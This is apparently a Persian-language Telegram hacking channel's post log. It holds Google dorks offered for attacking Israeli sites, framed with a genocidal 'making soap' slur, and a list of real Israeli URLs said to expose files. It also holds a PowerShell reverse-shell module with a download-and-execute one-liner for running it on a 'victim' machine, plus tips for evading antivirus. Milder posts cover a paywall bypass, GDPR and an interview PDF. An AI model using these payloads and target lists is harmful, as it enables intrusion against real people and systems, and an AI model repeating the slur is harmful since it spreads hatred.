چی میشه اگر یه برنامه نویس فولدر .git رو داخل هاست اپلود کنه؟
در ویدیو زیر به برسی دایرکتوری .git و نحوه اکسپلویت کردن این دایرکتوری میپردازیم.
در بحث بالا بردن اهمیت این آسیب پذیری در باگ بانتی
و یا برسی کردنشیال ها یا … در عملیات های رد تیم
https://youtu.be/nQp0Me4tTEU?si=C4fG3F0xF8bfFde8
در ویدیو زیر به برسی دایرکتوری .git و نحوه اکسپلویت کردن این دایرکتوری میپردازیم.
در بحث بالا بردن اهمیت این آسیب پذیری در باگ بانتی
و یا برسی کردنشیال ها یا … در عملیات های رد تیم
https://youtu.be/nQp0Me4tTEU?si=C4fG3F0xF8bfFde8
👌7
گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍
site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=
site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"
site:*.il inurl:news.php?id=
site:*.il "index of /"
میتونین خودتون تغیراتی ایجاد کنید👍
site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=
site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"
site:*.il inurl:news.php?id=
site:*.il "index of /"
👍6👎2
http://tzafrir.org.il/~tzafrir/git_test/.git/
https://apache.co.il/zzz/
https://www.flutedoc.co.il/
https://pdf.melumad.co.il/
https://flashner.co.il/~efraim/
https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f
https://asidesign.co.il/wp-content/uploads/
https://tuticafe.co.il/wp-content/uploads/
با یدونه از گوگل دورک های بالا ریختن بیرون
https://apache.co.il/zzz/
https://www.flutedoc.co.il/
https://pdf.melumad.co.il/
https://flashner.co.il/~efraim/
https://git.shore.co.il/nimrod/igentify/-/tree/02fa7300160b70c93bc230419f0a49b150e2fe5f
https://asidesign.co.il/wp-content/uploads/
https://tuticafe.co.il/wp-content/uploads/
با یدونه از گوگل دورک های بالا ریختن بیرون
😈6👎2
با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:
https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1
کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.
مراحل اجرا:
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.
2. حالا با استفاده از یک پیلود مثل
iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.
دسترسی برقرار میشود!💣
نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1
کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.
مراحل اجرا:
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.
2. حالا با استفاده از یک پیلود مثل
iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.
دسترسی برقرار میشود!💣
نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
👍6👎2😈1
CyberSecurity
با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید: https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1 کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه. مراحل اجرا:…
دیشب روی ویندور 10 کامل تست شده و کار میکنه🤙
ممکنه در آنتی ویروس های آپدیت کمی مشکل داشته باشه, با ایجاد تایم بالا و کمی بازی مموری میتونید اون روهم بایپس کنید!
ممکنه در آنتی ویروس های آپدیت کمی مشکل داشته باشه, با ایجاد تایم بالا و کمی بازی مموری میتونید اون روهم بایپس کنید!
❤4
تو این سایت میتونید مقالاتِ پولیِ مدیوم رو رایگان باز کنید. در واقع خودش اشتراکِ مدیوم خریده و از طریقِ این سایت در دسترسِ عموم قرار داده.
@matitanium
@matitanium
❤7
GDPR چیست؟
GDPR (General Data Protection Regulation) یا قانون حفاظت از دادههای عمومی، مجموعه قوانینی است که توسط اتحادیه اروپا برای حفاظت از دادههای شخصی افراد وضع شده است. این قوانین شامل تمامی شرکتها و سازمانهایی میشود که اقدام به ذخیرهسازی یا پردازش اطلاعات کاربران اتحادیه اروپا میکنند، حتی اگر خارج از اتحادیه اروپا باشند
شرکتها موظفاند:
• حفاظت از دادههای شخصی کاربران مانند نام، ایمیل، آدرس IP و هر اطلاعاتی که به شناسایی یک فرد خاص کمک کند
• اطلاعرسانی در صورت نقض دادهها و رعایت شفافیت کامل در جمعآوری و استفاده از دادهها
در صورت عدم رعایت این قوانین، جریمههای سنگینی اعمال خواهد شد. این موضوع، سایتها و خدمات بینالمللی را نیز شامل میشود
@matitanium
GDPR (General Data Protection Regulation) یا قانون حفاظت از دادههای عمومی، مجموعه قوانینی است که توسط اتحادیه اروپا برای حفاظت از دادههای شخصی افراد وضع شده است. این قوانین شامل تمامی شرکتها و سازمانهایی میشود که اقدام به ذخیرهسازی یا پردازش اطلاعات کاربران اتحادیه اروپا میکنند، حتی اگر خارج از اتحادیه اروپا باشند
شرکتها موظفاند:
• حفاظت از دادههای شخصی کاربران مانند نام، ایمیل، آدرس IP و هر اطلاعاتی که به شناسایی یک فرد خاص کمک کند
• اطلاعرسانی در صورت نقض دادهها و رعایت شفافیت کامل در جمعآوری و استفاده از دادهها
در صورت عدم رعایت این قوانین، جریمههای سنگینی اعمال خواهد شد. این موضوع، سایتها و خدمات بینالمللی را نیز شامل میشود
@matitanium
👍2
VAPT Interview Questions and Answers.pdf
1.6 MB
VAPT Interview Questions and Answers.pdf